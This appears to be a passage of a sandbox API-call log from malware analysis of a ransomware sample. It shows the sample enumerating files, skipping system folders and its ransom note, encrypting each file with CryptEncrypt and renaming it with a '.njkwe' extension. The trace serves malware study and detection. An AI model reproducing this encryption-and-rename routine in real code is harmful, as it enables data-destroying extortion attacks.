GetProcessHeap () returned 0xbe0000 [0078.980] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0078.980] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x354, lpOverlapped=0x0) returned 1 [0078.982] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcac, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.982] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x354, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x354, lpOverlapped=0x0) returned 1 [0078.982] GetProcessHeap () returned 0xbe0000 [0078.982] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0078.982] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.982] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.982] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.983] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.983] CloseHandle (hObject=0x43c) returned 1 [0078.983] GetProcessHeap () returned 0xbe0000 [0078.983] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.983] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\396__Connections_Cellular_Si.mobil (Slovenia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 183 [0078.983] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\396__Connections_Cellular_Si.mobil (Slovenia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\396__connections_cellular_si.mobil (slovenia)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\396__Connections_Cellular_Si.mobil (Slovenia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\396__connections_cellular_si.mobil (slovenia)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.984] GetProcessHeap () returned 0xbe0000 [0078.984] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.984] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90e80580, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90e80580, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90e80580, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1d8, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="397__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", cAlternateFileName="397__C~1.PRO")) returned 1 [0078.984] lstrcmpiW (lpString1="397__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Windows") returned -1 [0078.984] lstrcmpiW (lpString1="397__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="$Recycle.bin") returned 1 [0078.984] lstrcmpiW (lpString1="397__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="System Volume Information") returned -1 [0078.984] lstrcmpiW (lpString1="397__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files") returned -1 [0078.984] lstrcmpiW (lpString1="397__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files (x86)") returned -1 [0078.984] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\397__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml") returned 147 [0078.984] StrStrIW (lpFirst="397__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpSrch=".njkwe") returned 0x0 [0078.984] lstrcmpW (lpString1="397__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.984] lstrcmpW (lpString1="397__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="taridd") returned -1 [0078.984] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\397__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.984] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\397__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\397__cellular_persimsettings_$(__iccid)_appid.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.985] GetTickCount () returned 0x115412c [0078.985] GetTickCount () returned 0x115412c [0078.985] GetTickCount () returned 0x115412c [0078.985] GetTickCount () returned 0x115412c [0078.985] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.985] GetProcessHeap () returned 0xbe0000 [0078.985] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0078.985] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x1d8, lpOverlapped=0x0) returned 1 [0078.986] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe28, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.986] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x1d8, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x1d8, lpOverlapped=0x0) returned 1 [0078.986] GetProcessHeap () returned 0xbe0000 [0078.986] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0078.987] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.987] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.987] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.987] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.987] CloseHandle (hObject=0x43c) returned 1 [0078.987] GetProcessHeap () returned 0xbe0000 [0078.987] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.988] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\397__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe") returned 167 [0078.988] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\397__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\397__cellular_persimsettings_$(__iccid)_appid.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\397__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\397__cellular_persimsettings_$(__iccid)_appid.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.988] GetProcessHeap () returned 0xbe0000 [0078.988] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.988] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90e80580, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90e80580, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90e80580, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c9, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="398__Connections_Cellular_Cell-C (South Africa)_i0$(__MVID)@WAP.provxml", cAlternateFileName="398__C~1.PRO")) returned 1 [0078.988] lstrcmpiW (lpString1="398__Connections_Cellular_Cell-C (South Africa)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.988] lstrcmpiW (lpString1="398__Connections_Cellular_Cell-C (South Africa)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.988] lstrcmpiW (lpString1="398__Connections_Cellular_Cell-C (South Africa)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.988] lstrcmpiW (lpString1="398__Connections_Cellular_Cell-C (South Africa)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.988] lstrcmpiW (lpString1="398__Connections_Cellular_Cell-C (South Africa)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.989] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\398__Connections_Cellular_Cell-C (South Africa)_i0$(__MVID)@WAP.provxml") returned 165 [0078.989] StrStrIW (lpFirst="398__Connections_Cellular_Cell-C (South Africa)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.989] lstrcmpW (lpString1="398__Connections_Cellular_Cell-C (South Africa)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.989] lstrcmpW (lpString1="398__Connections_Cellular_Cell-C (South Africa)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.989] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\398__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.989] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\398__Connections_Cellular_Cell-C (South Africa)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\398__connections_cellular_cell-c (south africa)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.989] GetTickCount () returned 0x115412c [0078.989] GetTickCount () returned 0x115412c [0078.989] GetTickCount () returned 0x115412c [0078.989] GetTickCount () returned 0x115412c [0078.989] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.989] GetProcessHeap () returned 0xbe0000 [0078.989] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0078.989] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2c9, lpOverlapped=0x0) returned 1 [0078.991] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd37, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.991] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2c9, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2c9, lpOverlapped=0x0) returned 1 [0078.991] GetProcessHeap () returned 0xbe0000 [0078.991] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0078.991] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.991] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.991] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.991] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.007] CloseHandle (hObject=0x43c) returned 1 [0079.007] GetProcessHeap () returned 0xbe0000 [0079.007] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.007] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\398__Connections_Cellular_Cell-C (South Africa)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 185 [0079.008] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\398__Connections_Cellular_Cell-C (South Africa)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\398__connections_cellular_cell-c (south africa)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\398__Connections_Cellular_Cell-C (South Africa)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\398__connections_cellular_cell-c (south africa)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.008] GetProcessHeap () returned 0xbe0000 [0079.008] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.008] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90ea67ef, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90ea67ef, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90ea67ef, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x291, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="399__Connections_Cellular_MTN South Africa (South Africa)_i0$(__MVID)@WAP.provxml", cAlternateFileName="399__C~1.PRO")) returned 1 [0079.008] lstrcmpiW (lpString1="399__Connections_Cellular_MTN South Africa (South Africa)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.008] lstrcmpiW (lpString1="399__Connections_Cellular_MTN South Africa (South Africa)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.008] lstrcmpiW (lpString1="399__Connections_Cellular_MTN South Africa (South Africa)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.008] lstrcmpiW (lpString1="399__Connections_Cellular_MTN South Africa (South Africa)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.008] lstrcmpiW (lpString1="399__Connections_Cellular_MTN South Africa (South Africa)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.008] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\399__Connections_Cellular_MTN South Africa (South Africa)_i0$(__MVID)@WAP.provxml") returned 175 [0079.008] StrStrIW (lpFirst="399__Connections_Cellular_MTN South Africa (South Africa)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.009] lstrcmpW (lpString1="399__Connections_Cellular_MTN South Africa (South Africa)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.009] lstrcmpW (lpString1="399__Connections_Cellular_MTN South Africa (South Africa)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.009] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\399__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.009] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\399__Connections_Cellular_MTN South Africa (South Africa)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\399__connections_cellular_mtn south africa (south africa)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.009] GetTickCount () returned 0x115412c [0079.009] GetTickCount () returned 0x115412c [0079.009] GetTickCount () returned 0x115412c [0079.009] GetTickCount () returned 0x115412c [0079.009] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.009] GetProcessHeap () returned 0xbe0000 [0079.009] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.009] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x291, lpOverlapped=0x0) returned 1 [0079.011] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd6f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.011] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x291, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x291, lpOverlapped=0x0) returned 1 [0079.011] GetProcessHeap () returned 0xbe0000 [0079.011] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.011] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.011] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.061] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.061] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.062] CloseHandle (hObject=0x43c) returned 1 [0079.062] GetProcessHeap () returned 0xbe0000 [0079.062] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.062] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\399__Connections_Cellular_MTN South Africa (South Africa)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 195 [0079.062] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\399__Connections_Cellular_MTN South Africa (South Africa)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\399__connections_cellular_mtn south africa (south africa)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\399__Connections_Cellular_MTN South Africa (South Africa)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\399__connections_cellular_mtn south africa (south africa)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.063] GetProcessHeap () returned 0xbe0000 [0079.063] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.063] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90221ca6, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90221ca6, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90221ca6, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x353, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="39__Connections_Cellular_VELCOM (Belarus)_i0$(__MVID)@WAP.provxml", cAlternateFileName="39__CO~1.PRO")) returned 1 [0079.063] lstrcmpiW (lpString1="39__Connections_Cellular_VELCOM (Belarus)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.063] lstrcmpiW (lpString1="39__Connections_Cellular_VELCOM (Belarus)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.063] lstrcmpiW (lpString1="39__Connections_Cellular_VELCOM (Belarus)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.063] lstrcmpiW (lpString1="39__Connections_Cellular_VELCOM (Belarus)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.063] lstrcmpiW (lpString1="39__Connections_Cellular_VELCOM (Belarus)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.063] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\39__Connections_Cellular_VELCOM (Belarus)_i0$(__MVID)@WAP.provxml") returned 159 [0079.063] StrStrIW (lpFirst="39__Connections_Cellular_VELCOM (Belarus)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.063] lstrcmpW (lpString1="39__Connections_Cellular_VELCOM (Belarus)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.063] lstrcmpW (lpString1="39__Connections_Cellular_VELCOM (Belarus)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.063] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\39__Connectio", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start 